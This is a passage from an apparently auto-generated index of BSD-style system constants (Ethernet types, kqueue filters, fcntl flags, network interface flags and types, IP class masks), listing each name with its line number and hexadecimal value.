ETHERTYPE_NBPRAR (line 445) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 446) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 447) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 448) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 449) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 450) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 451) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 452) | ETHERTYPE_NESTAR = 0x8006 constant ETHERTYPE_NETBEUI (line 453) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NOVELL (line 454) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 455) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 456) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 457) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NTRAILER (line 458) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 459) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 460) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 461) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PAE (line 462) | ETHERTYPE_PAE = 0x888e constant ETHERTYPE_PCS (line 463) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 464) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 465) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 466) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 467) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 468) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 469) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 470) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_RACAL (line 471) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 472) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 473) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 474) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 475) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 476) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 477) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 478) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 479) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 480) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 481) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 482) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 483) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 484) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 485) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 486) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOWPROTOCOLS (line 487) | ETHERTYPE_SLOWPROTOCOLS = 0x8809 constant ETHERTYPE_SNA (line 488) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 489) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 490) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 491) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 492) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 493) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 494) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 495) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 496) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 497) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 498) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 499) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 500) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 501) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 502) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 503) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 504) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 505) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 506) | ETHERTYPE_UBDL = 0x7000 constant ETHERTYPE_UBNIU (line 507) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 508) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 509) | ETHERTYPE_VALID = 0x1600 constant ETHERTYPE_VARIAN (line 510) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 511) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 512) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 513) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 514) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 515) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 516) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 517) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 518) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 519) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 520) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 521) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 522) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 523) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 524) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 525) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 526) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 527) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 528) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 529) | ETHER_ADDR_LEN = 0x6 constant ETHER_CRC_LEN (line 530) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 531) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 532) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 533) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_LEN (line 534) | ETHER_MAX_LEN = 0x5ee constant ETHER_MAX_LEN_JUMBO (line 535) | ETHER_MAX_LEN_JUMBO = 0x233a constant ETHER_MIN_LEN (line 536) | ETHER_MIN_LEN = 0x40 constant ETHER_PPPOE_ENCAP_LEN (line 537) | ETHER_PPPOE_ENCAP_LEN = 0x8 constant ETHER_TYPE_LEN (line 538) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 539) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 540) | EVFILT_AIO = 0x2 constant EVFILT_PROC (line 541) | EVFILT_PROC = 0x4 constant EVFILT_READ (line 542) | EVFILT_READ = 0x0 constant EVFILT_SIGNAL (line 543) | EVFILT_SIGNAL = 0x5 constant EVFILT_SYSCOUNT (line 544) | EVFILT_SYSCOUNT = 0x7 constant EVFILT_TIMER (line 545) | EVFILT_TIMER = 0x6 constant EVFILT_VNODE (line 546) | EVFILT_VNODE = 0x3 constant EVFILT_WRITE (line 547) | EVFILT_WRITE = 0x1 constant EV_ADD (line 548) | EV_ADD = 0x1 constant EV_CLEAR (line 549) | EV_CLEAR = 0x20 constant EV_DELETE (line 550) | EV_DELETE = 0x2 constant EV_DISABLE (line 551) | EV_DISABLE = 0x8 constant EV_ENABLE (line 552) | EV_ENABLE = 0x4 constant EV_EOF (line 553) | EV_EOF = 0x8000 constant EV_ERROR (line 554) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 555) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 556) | EV_ONESHOT = 0x10 constant EV_SYSFLAGS (line 557) | EV_SYSFLAGS = 0xf000 constant EXTA (line 558) | EXTA = 0x4b00 constant EXTATTR_CMD_START (line 559) | EXTATTR_CMD_START = 0x1 constant EXTATTR_CMD_STOP (line 560) | EXTATTR_CMD_STOP = 0x2 constant EXTATTR_NAMESPACE_SYSTEM (line 561) | EXTATTR_NAMESPACE_SYSTEM = 0x2 constant EXTATTR_NAMESPACE_USER (line 562) | EXTATTR_NAMESPACE_USER = 0x1 constant EXTB (line 563) | EXTB = 0x9600 constant EXTPROC (line 564) | EXTPROC = 0x800 constant FD_CLOEXEC (line 565) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 566) | FD_SETSIZE = 0x100 constant FLUSHO (line 567) | FLUSHO = 0x800000 constant F_CLOSEM (line 568) | F_CLOSEM = 0xa constant F_DUPFD (line 569) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 570) | F_DUPFD_CLOEXEC = 0xc constant F_FSCTL (line 571) | F_FSCTL = -0x80000000 constant F_FSDIRMASK (line 572) | F_FSDIRMASK = 0x70000000 constant F_FSIN (line 573) | F_FSIN = 0x10000000 constant F_FSINOUT (line 574) | F_FSINOUT = 0x30000000 constant F_FSOUT (line 575) | F_FSOUT = 0x20000000 constant F_FSPRIV (line 576) | F_FSPRIV = 0x8000 constant F_FSVOID (line 577) | F_FSVOID = 0x40000000 constant F_GETFD (line 578) | F_GETFD = 0x1 constant F_GETFL (line 579) | F_GETFL = 0x3 constant F_GETLK (line 580) | F_GETLK = 0x7 constant F_GETNOSIGPIPE (line 581) | F_GETNOSIGPIPE = 0xd constant F_GETOWN (line 582) | F_GETOWN = 0x5 constant F_MAXFD (line 583) | F_MAXFD = 0xb constant F_OK (line 584) | F_OK = 0x0 constant F_PARAM_MASK (line 585) | F_PARAM_MASK = 0xfff constant F_PARAM_MAX (line 586) | F_PARAM_MAX = 0xfff constant F_RDLCK (line 587) | F_RDLCK = 0x1 constant F_SETFD (line 588) | F_SETFD = 0x2 constant F_SETFL (line 589) | F_SETFL = 0x4 constant F_SETLK (line 590) | F_SETLK = 0x8 constant F_SETLKW (line 591) | F_SETLKW = 0x9 constant F_SETNOSIGPIPE (line 592) | F_SETNOSIGPIPE = 0xe constant F_SETOWN (line 593) | F_SETOWN = 0x6 constant F_UNLCK (line 594) | F_UNLCK = 0x2 constant F_WRLCK (line 595) | F_WRLCK = 0x3 constant HUPCL (line 596) | HUPCL = 0x4000 constant HW_MACHINE (line 597) | HW_MACHINE = 0x1 constant ICANON (line 598) | ICANON = 0x100 constant ICMP6_FILTER (line 599) | ICMP6_FILTER = 0x12 constant ICRNL (line 600) | ICRNL = 0x100 constant IEXTEN (line 601) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 602) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 603) | IFAN_DEPARTURE = 0x1 constant IFA_ROUTE (line 604) | IFA_ROUTE = 0x1 constant IFF_ALLMULTI (line 605) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 606) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 607) | IFF_CANTCHANGE = 0x8f52 constant IFF_DEBUG (line 608) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 609) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 610) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 611) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 612) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 613) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 614) | IFF_NOARP = 0x80 constant IFF_NOTRAILERS (line 615) | IFF_NOTRAILERS = 0x20 constant IFF_OACTIVE (line 616) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 617) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 618) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 619) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 620) | IFF_SIMPLEX = 0x800 constant IFF_UP (line 621) | IFF_UP = 0x1 constant IFNAMSIZ (line 622) | IFNAMSIZ = 0x10 constant IFT_1822 (line 623) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 624) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 625) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 626) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 627) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 628) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 629) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 630) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 631) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 632) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 633) | IFT_ASYNC = 0x54 constant IFT_ATM (line 634) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 635) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 636) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 637) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 638) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 639) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 640) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 641) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 642) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 643) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BRIDGE (line 644) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 645) | IFT_BSC = 0x53 constant IFT_CARP (line 646) | IFT_CARP = 0xf8 constant IFT_CCTEMUL (line 647) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 648) | IFT_CEPT = 0x13 constant IFT_CES (line 649) | IFT_CES = 0x85 constant IFT_CHANNEL (line 650) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 651) | IFT_CNR = 0x55 constant IFT_COFFEE (line 652) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 653) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 654) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 655) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 656) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 657) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 658) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 659) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 660) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 661) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 662) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 663) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 664) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 665) | IFT_DS3 = 0x1e constant IFT_DTM (line 666) | IFT_DTM = 0x8c constant IFT_DVBASILN (line 667) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 668) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 669) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 670) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 671) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 672) | IFT_ECONET = 0xce constant IFT_EON (line 673) | IFT_EON = 0x19 constant IFT_EPLRS (line 674) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 675) | IFT_ESCON = 0x49 constant IFT_ETHER (line 676) | IFT_ETHER = 0x6 constant IFT_FAITH (line 677) | IFT_FAITH = 0xf2 constant IFT_FAST (line 678) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 679) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 680) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 681) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 682) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 683) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 684) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 685) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 686) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 687) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 688) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 689) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 690) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 691) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 692) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 693) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 694) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 695) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 696) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 697) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 698) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 699) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 700) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 701) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 702) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 703) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 704) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 705) | IFT_HSSI = 0x2e constant IFT_HY (line 706) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 707) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 708) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 709) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 710) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 711) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 712) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 713) | IFT_IFGSN = 0x91 constant IFT_IMT (line 714) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 715) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 716) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 717) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 718) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 719) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 720) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 721) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 722) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 723) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 724) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 725) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 726) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 727) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 728) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 729) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 730) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 731) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 732) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 733) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 734) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 735) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 736) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 737) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 738) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 739) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 740) | IFT_LAPB = 0x10 constant IFT_LAPD (line 741) | IFT_LAPD = 0x4d constant IFT_LAPF (line 742) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 743) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 744) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 745) | IFT_LOOP = 0x18 constant IFT_MEDIAMAILOVERIP (line 746) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 747) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 748) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 749) | IFT_MODEM = 0x30 constant IFT_MPC (line 750) | IFT_MPC = 0x71 constant IFT_MPLS (line 751) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 752) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 753) | IFT_MSDSL = 0x8f constant IFT_MVL (line 754) | IFT_MVL = 0xbf constant IFT_MYRINET (line 755) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 756) | IFT_NFAS = 0xaf constant IFT_NSIP (line 757) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 758) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 759) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 760) | IFT_OTHER = 0x1 constant IFT_P10 (line 761) | IFT_P10 = 0xc constant IFT_P80 (line 762) | IFT_P80 = 0xd constant IFT_PARA (line 763) | IFT_PARA = 0x22 constant IFT_PFLOG (line 764) | IFT_PFLOG = 0xf5 constant IFT_PFSYNC (line 765) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 766) | IFT_PLC = 0xae constant IFT_PON155 (line 767) | IFT_PON155 = 0xcf constant IFT_PON622 (line 768) | IFT_PON622 = 0xd0 constant IFT_POS (line 769) | IFT_POS = 0xab constant IFT_PPP (line 770) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 771) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 772) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 773) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 774) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 775) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 776) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 777) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 778) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 779) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 780) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 781) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 782) | IFT_PVC = 0xf1 constant IFT_Q2931 (line 783) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 784) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 785) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 786) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 787) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 788) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 789) | IFT_RS232 = 0x21 constant IFT_RSRB (line 790) | IFT_RSRB = 0x4f constant IFT_SDLC (line 791) | IFT_SDLC = 0x11 constant IFT_SDSL (line 792) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 793) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 794) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 795) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 796) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 797) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 798) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 799) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 800) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 801) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 802) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 803) | IFT_SONETVT = 0x33 constant IFT_SRP (line 804) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 805) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 806) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 807) | IFT_STARLAN = 0xb constant IFT_STF (line 808) | IFT_STF = 0xd7 constant IFT_T1 (line 809) | IFT_T1 = 0x12 constant IFT_TDLC (line 810) | IFT_TDLC = 0x74 constant IFT_TELINK (line 811) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 812) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 813) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 814) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 815) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 816) | IFT_ULTRA = 0x1d constant IFT_USB (line 817) | IFT_USB = 0xa0 constant IFT_V11 (line 818) | IFT_V11 = 0x40 constant IFT_V35 (line 819) | IFT_V35 = 0x2d constant IFT_V36 (line 820) | IFT_V36 = 0x41 constant IFT_V37 (line 821) | IFT_V37 = 0x78 constant IFT_VDSL (line 822) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 823) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 824) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 825) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 826) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 827) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 828) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 829) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 830) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 831) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 832) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 833) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 834) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 835) | IFT_VOICEOVERIP = 0x68 constant IFT_X213 (line 836) | IFT_X213 = 0x5d constant IFT_X25 (line 837) | IFT_X25 = 0x5 constant IFT_X25DDN (line 838) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 839) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 840) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 841) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 842) | IFT_XETHER = 0x1a constant IGNBRK (line 843) | IGNBRK = 0x1 constant IGNCR (line 844) | IGNCR = 0x80 constant IGNPAR (line 845) | IGNPAR = 0x4 constant IMAXBEL (line 846) | IMAXBEL = 0x2000 constant INLCR (line 847) | INLCR = 0x40 constant INPCK (line 848) | INPCK = 0x10 constant IN_CLASSA_HOST (line 849) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 850) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 851) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 852) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 853) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 854) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 855) 